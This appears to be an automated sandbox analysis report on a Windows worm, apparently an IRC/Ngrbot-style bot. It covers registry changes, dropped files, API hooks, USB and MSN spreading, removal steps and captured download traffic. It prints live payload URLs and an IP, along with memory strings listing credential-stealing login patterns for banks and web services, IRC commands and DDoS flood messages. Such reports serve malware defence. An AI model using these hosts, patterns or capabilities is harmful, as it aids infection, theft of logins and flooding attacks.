"uuid" = "6F 9A 57 53 0A 29 1B 4E BE 6B 6A D9 6F E7 5E 1E"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"My Video" = "%Documents and Settings%\%current user%\My Documents\My Videos"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Classes\CLSID\{6F9A5753-0A29-1B4E-BE6B-6AD96FE75E1E}\0E7302EC\CG1]
"HAL" = "05 EE 00 00"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lgzovpzqe.exe]
"DisableExceptionChainValidation" = ""
[HKCU\Software\Classes\CLSID\{6F9A5753-0A29-1B4E-BE6B-6AD96FE75E1E}\0E7302EC\CG1]
"BID" = "20 00 08 00 13 00 06 00 DE 07 00 00 14 00 88 FF"
Dropped PE files
MD5 | File path |
---|---|
830da209ecc9fb980d35ba8d2e61bb27 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\bet[1].exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Worm installs the following user-mode hooks in WININET.dll:
HttpSendRequestW
InternetWriteFile
HttpSendRequestA
The Worm installs the following user-mode hooks in DNSAPI.dll:
DnsQuery_A
DnsQuery_W
The Worm installs the following user-mode hooks in WS2_32.dll:
send
GetAddrInfoW
The Worm installs the following user-mode hooks in kernel32.dll:
MoveFileA
CopyFileW
CopyFileA
MoveFileW
CreateFileW
CreateFileA
The Worm installs the following user-mode hooks in ntdll.dll:
LdrLoadDll
NtResumeThread
NtQueryDirectoryFile
NtEnumerateValueKey
Propagation
A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Worm's file once a user opens a drive's folder in Windows Explorer. A program can register a device notification with the help of RegisterDeviceNotification, so it is notified when a USB device is plugged in; the worm then copies itself to the USB device plugged into the affected computer. A worm can spread copies of itself through MSN Messenger.
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
ngggg.exe:1096
ngggg.exe:1596
ngggg.exe:912
calc.exe:3372
zthzjntzphj.exe:3036
%original file name%.exe:1984
dqqq.exe:180
vuxrwahifpa.exe:3788
vuxrwahifpa.exe:3272
vuxrwahifpa.exe:2984
bpihytyvgix.exe:2996
sppp.exe:3284
sppp.exe:2528
bett.exe:1580
bett.exe:1672
- Delete the original Worm file.
- Delete or disinfect the following files created/modified by the Worm:
%Documents and Settings%\%current user%\Application Data\c731200 (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\c731200 (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ngggg.exe (9505 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bett.exe (62128 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\dq[1].exe (21775 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\dqqq.exe (12735 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\spm[1].exe (43891 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\ng[1].exe (33073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\bet[1].exe (70237 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sppp.exe (33910 bytes)
%Documents and Settings%\%current user%\My Documents\My Videos\Desktop.ini (312 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Uukmkg" = "%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"MicrosoftPerfWD" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\sppp.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name:
Product Version: 1.0.10.0
Legal Copyright: Copyright (c) 2000-2004 Oleh Yuschuk
Legal Trademarks:
Original Filename:
Internal Name: OllyDbg
File Version: 1.0.10.0
File Description: OllyDbg, 32-bit analysing debugger
Comments:
Language: Language Neutral
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 40083 | 40448 | 4.52037 | 3968259063d25d635df3bc4a5234b1b8 |
.rdata | 45056 | 14292 | 14336 | 3.63511 | 2ddde80c1d07fe980d71d92932333fc0 |
.data | 61440 | 14180 | 6656 | 4.27116 | b2d13cdfd2b27a256886545f3f3b11c7 |
.rsrc | 77824 | 35156 | 35328 | 4.78522 | 92d80d4490430c356f5bb6edf9e29c21 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://dl.dqwjnewkwefewamail.com/bet.exe | 54.193.9.202 |
hxxp://dl.dqwjnewkwefewamail.com/ng.exe | 54.193.9.202 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /bet.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: dl.dqwjnewkwefewamail.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 19 Jun 2014 16:43:30 GMT
Server: Apache/2.2.27 (Amazon)
Last-Modified: Thu, 19 Jun 2014 14:49:25 GMT
ETag: "20f74-4c200-4fc317ba75165"
Accept-Ranges: bytes
Content-Length: 311808
Connection: close
Content-Type: application/octet-stream
<<< skipped >>>
GET /ng.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: dl.dqwjnewkwefewamail.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 19 Jun 2014 16:45:16 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Thu, 19 Jun 2014 13:46:51 GMT
ETag: "603d8-37a00-4fc309be5c8c0"
Accept-Ranges: bytes
Content-Length: 227840
Connection: close
Content-Type: application/octet-stream
<<< skipped >>>
Map
The Worm connects to the servers at the following location(s):
Strings from Dumps
KERNEL32.dll
KERNEL32.dll
.VI3xqr
.VI3xqr
zcÁ
zcÁ
Udp?iw0
Udp?iw0
/#"%f
/#"%f
P.oUw
P.oUw
B%Su[
B%Su[
Rkka.by
Rkka.by
.dYi'
.dYi'
p.Cvq
p.Cvq
.EU{%
.EU{%
<pre>[HTTP]: Updated HTTP 
spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>7 767<7~7</pre><pre>8*808;8~8</pre><pre>{A5DCBF10-6530-11D2-901F-00C04FB951ED}</pre><pre>shlwapi.dll</pre><pre>crypt32.dll</pre><pre>wtsapi32.dll</pre><pre>samcli.dll</pre><pre>netutils.dll</pre><pre>userenv.dll</pre><pre>WindowsSecondaryDesktop</pre><pre>\charmap.exe</pre><pre>\Windows Media 
Player\wmprph.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>Aadvapi32.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><b>calc.exe_1160:</b><pre>.text</pre><pre>`.data</pre><pre>.rsrc</pre><pre>SHELL32.dll</pre><pre>msvcrt.dll</pre><pre>ADVAPI32.dll</pre><pre>KERNEL32.dll</pre><pre>GDI32.dll</pre><pre>USER32.dll</pre><pre>hhctrl.ocx</pre><pre>CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32</pre><pre>calc.pdb</pre><pre>j.OXO</pre><pre>_acmdln</pre><pre>RegCloseKey</pre><pre>RegOpenKeyExA</pre><pre>name="Microsoft.Windows.Shell.calc"</pre><pre>version="5.1.0.0"</pre><pre><description>Windows Shell</description></pre><pre>name="Microsoft.Windows.Common-Controls"</pre><pre>version="6.0.0.0"</pre><pre>publicKeyToken="6595b64144ccf1df"</pre><pre>CalcMsgPumpWnd</pre><pre>The requested operation may take a very long time to complete.</pre><pre>Do you want to let the calculation continue, or stop the operation now?</pre><pre>Windows Calculator application file</pre><pre>5.1.2600.0 (xpclient.010817-1148)</pre><pre>CALC.EXE</pre><pre>Windows</pre><pre>Operating System</pre><pre>5.1.2600.0</pre><pre>Operation was canceled.-Calc does not have enough memory to continue.eThe requested 
function may take a very long time to complete.</pre><pre>Do you want to abort the operation now?</pre><pre>calc.hlp</pre><pre>Cannot open Clipboard.TThere is not enough memory for data.</pre><pre>calc.chm</pre><b>calc.exe_1160_rwx_000A0000_00002000:</b><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\</pre><pre>458757875</pre><pre>a1ox0.exe</pre><pre>wjjza.exe</pre><pre>tj07a.exe</pre><pre>wd6ql.exe</pre><pre>6tr3f.exe</pre><pre>uc4de.exe</pre><pre>uzue6.exe</pre><pre>tzm0b.exe</pre><pre>xkp0h.exe</pre><pre>m5h8j.exe</pre><pre>sbt6e.exe</pre><pre>1sq28.exe</pre><pre>pla6o.exe</pre><pre>26y6n.exe</pre><pre>z6dea.exe</pre><pre>2ld02.exe</pre><pre>m55uw.exe</pre><pre>5x8mu.exe</pre><pre>640ha.exe</pre><pre>user32.dll</pre><pre>urlmon.dll</pre><pre>URLDownloadToFileA</pre><pre>wininet.dll</pre><pre>http://www.google.com</pre><b>notepad.exe_1520:</b><pre>.text</pre><pre>`.data</pre><pre>.rsrc</pre><pre>comdlg32.dll</pre><pre>SHELL32.dll</pre><pre>WINSPOOL.DRV</pre><pre>COMCTL32.dll</pre><pre>msvcrt.dll</pre><pre>ADVAPI32.dll</pre><pre>KERNEL32.dll</pre><pre>NTDLL.DLL</pre><pre>GDI32.dll</pre><pre>USER32.dll</pre><pre>notepad.chm</pre><pre>hhctrl.ocx</pre><pre>CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32</pre><pre>notepad.pdb</pre><pre>t%SSh</pre><pre>_acmdln</pre><pre>RegCloseKey</pre><pre>RegCreateKeyW</pre><pre>RegOpenKeyExA</pre><pre>SetViewportExtEx</pre><pre>GetKeyboardLayout</pre><pre>name="Microsoft.Windows.Shell.notepad"</pre><pre>version="5.1.0.0"</pre><pre><description>Windows Shell</description></pre><pre>name="Microsoft.Windows.Common-Controls"</pre><pre>version="6.0.0.0"</pre><pre>publicKeyToken="6595b64144ccf1df"</pre><pre>&*$#$$#$*</pre><pre>MMMrMMM`MMMRMMMFMMM:MMM.MMM"MMM</pre><pre>*.txt</pre><pre>/.SETUP</pre><pre>5.1.2600.5512 (xpsp.080413-2105)</pre><pre>NOTEPAD.EXE</pre><pre>Windows</pre><pre>Operating System</pre><pre>5.1.2600.5512</pre><pre>notepad.hlp</pre><pre>Text Documents (*.txt)</pre><pre>You cannot quit Windows because the 
Save As dialog</pre><pre>dialog box, and then try quitting Windows again.</pre><pre>Common Dialog error (0xx)</pre><pre>Not enough memory available to complete this operation. Quit one or more applications to increase available memory, and then try again.KThe %% file is too large for Notepad.</pre><pre>Not a valid file name.MCannot create the %% file.</pre><pre>Make sure that the path and filename are correct.RCannot carry out the Word Wrap command because there is too much text in the file.</pre><pre>Page %d</pre><pre>Ln %d, Col %d</pre><b>calc.exe_1160_rwx_00970000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s 
(p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><p
re>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d 
KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" 
s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. 
[e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>\\.\pipe\c1419a97</pre><pre>%System%\calc.exe</pre><pre>%WinDir%</pre><pre>%Documents and Settings%\%current user%\Application Data\Identities\Uukmkg.exe</pre><pre>7 767<7~7</pre><pre>8*808;8~8</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" 
%S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>wininet.dll</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>notepad.exe</pre><pre>Aadvapi32.dll</pre><pre>urlmon.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\Device\HarddiskVolume1\WINDOWS\system32\calc.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe</pre><b>calc.exe_1160_rwx_00A00000_00027000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.rsrc</pre><pre>@.reloc</pre><pre>PSSSSSSh</pre><pre>PSSVSSh</pre><pre>RPVSSh</pre><pre>PSSh(</pre><pre>PSSh#</pre><pre>PSSh'</pre><pre>PSSh&</pre><pre>PSSh*</pre><pre>9p.uV</pre><b>calc.exe_1160_rwx_00A28000_00072000:</b><pre>Opera/9.00 (Windows NT 5.1; U; en)</pre><pre>Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)</pre><pre>Mozilla/4.0 (compatible; MSIE 6.01; Windows NT 6.0)</pre><pre>Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2)</pre><pre>Opera 9.4 (Windows NT 6.1; U; en)</pre><pre>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)</pre><pre>Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; NeosBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)</pre><pre>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0; .NET CLR 1.1.4322; Windows-Media-Player/10.00.00.3990; InfoPath.2</pre><pre>Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060410 Firefox/1.0.8</pre><pre>Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11</pre><pre>Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)</pre><pre>Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 
